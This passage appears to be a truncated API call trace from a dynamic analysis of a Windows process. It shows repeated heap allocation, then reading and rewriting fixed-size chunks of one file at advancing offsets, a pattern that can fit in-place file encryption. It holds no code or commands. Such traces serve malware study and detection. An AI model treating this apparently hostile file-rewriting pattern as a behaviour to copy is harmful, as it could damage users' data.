(HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.038] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x87e60a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.038] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.378] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x87e60a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.379] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.380] GetProcessHeap () returned 0x500000 [0124.381] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.381] GetProcessHeap () returned 0x500000 [0124.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.381] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8823130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.381] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.391] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8823130, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.391] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.392] GetProcessHeap () returned 0x500000 [0124.392] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.392] GetProcessHeap () returned 0x500000 [0124.392] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.392] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x88601c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.392] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.414] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x88601c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.414] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.415] GetProcessHeap () returned 0x500000 [0124.415] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.415] GetProcessHeap () returned 0x500000 [0124.415] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.415] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x889d250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.415] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.427] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x889d250, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.427] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.427] GetProcessHeap () returned 0x500000 [0124.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.428] GetProcessHeap () returned 0x500000 [0124.428] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.428] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x88da2e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.428] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.439] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x88da2e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.439] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.440] GetProcessHeap () returned 0x500000 [0124.440] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.440] GetProcessHeap () returned 0x500000 [0124.440] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.440] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8917370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.440] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.469] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8917370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.469] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.470] GetProcessHeap () returned 0x500000 [0124.470] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.470] GetProcessHeap () returned 0x500000 [0124.470] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.470] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8954400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.470] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.545] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8954400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.545] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.546] GetProcessHeap () returned 0x500000 [0124.546] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.546] GetProcessHeap () returned 0x500000 [0124.546] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.546] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8991490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.546] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.557] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8991490, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.557] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.557] GetProcessHeap () returned 0x500000 [0124.557] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.557] GetProcessHeap () returned 0x500000 [0124.557] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.557] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x89ce520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.557] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.568] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x89ce520, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.568] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.569] GetProcessHeap () returned 0x500000 [0124.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.569] GetProcessHeap () returned 0x500000 [0124.569] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.569] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a0b5b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.569] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.591] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a0b5b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.591] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.592] GetProcessHeap () returned 0x500000 [0124.592] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.592] GetProcessHeap () returned 0x500000 [0124.592] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.592] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a48640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.592] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.603] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a48640, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.603] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.603] GetProcessHeap () returned 0x500000 [0124.603] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.603] GetProcessHeap () returned 0x500000 [0124.603] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.604] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a856d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.604] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.613] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8a856d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.613] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.613] GetProcessHeap () returned 0x500000 [0124.614] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.614] GetProcessHeap () returned 0x500000 [0124.614] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.614] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ac2760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.614] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.660] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ac2760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.660] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.661] GetProcessHeap () returned 0x500000 [0124.661] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.661] GetProcessHeap () returned 0x500000 [0124.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.661] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8aff7f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.661] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.682] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8aff7f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.682] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.684] GetProcessHeap () returned 0x500000 [0124.684] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.684] GetProcessHeap () returned 0x500000 [0124.684] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.684] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8b3c880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.685] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.694] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8b3c880, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.694] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.694] GetProcessHeap () returned 0x500000 [0124.694] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.694] GetProcessHeap () returned 0x500000 [0124.694] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.694] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8b79910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.695] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.709] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8b79910, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.709] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.709] GetProcessHeap () returned 0x500000 [0124.709] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.710] GetProcessHeap () returned 0x500000 [0124.710] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.710] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8bb69a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.710] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.734] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8bb69a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.734] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.735] GetProcessHeap () returned 0x500000 [0124.735] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.735] GetProcessHeap () returned 0x500000 [0124.735] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.735] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8bf3a30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.735] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.776] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8bf3a30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.776] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.781] GetProcessHeap () returned 0x500000 [0124.781] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.781] GetProcessHeap () returned 0x500000 [0124.781] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.781] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8c30ac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.781] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.801] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8c30ac0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.801] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.801] GetProcessHeap () returned 0x500000 [0124.801] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.801] GetProcessHeap () returned 0x500000 [0124.802] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.802] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8c6db50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.802] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.830] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8c6db50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.830] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.831] GetProcessHeap () returned 0x500000 [0124.831] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.831] GetProcessHeap () returned 0x500000 [0124.831] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.831] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8caabe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.831] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0124.961] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8caabe0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.961] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0124.962] GetProcessHeap () returned 0x500000 [0124.962] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0124.962] GetProcessHeap () returned 0x500000 [0124.962] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0124.962] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ce7c70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.962] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.001] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8ce7c70, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.001] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.002] GetProcessHeap () returned 0x500000 [0125.002] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0125.002] GetProcessHeap () returned 0x500000 [0125.002] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0125.002] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d24d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.002] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0125.010] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x8d24d00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.010] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0125.011] GetProcessHeap () returned 0x500000 [0125.011] HeapFree (in: hHeap=0x500000, 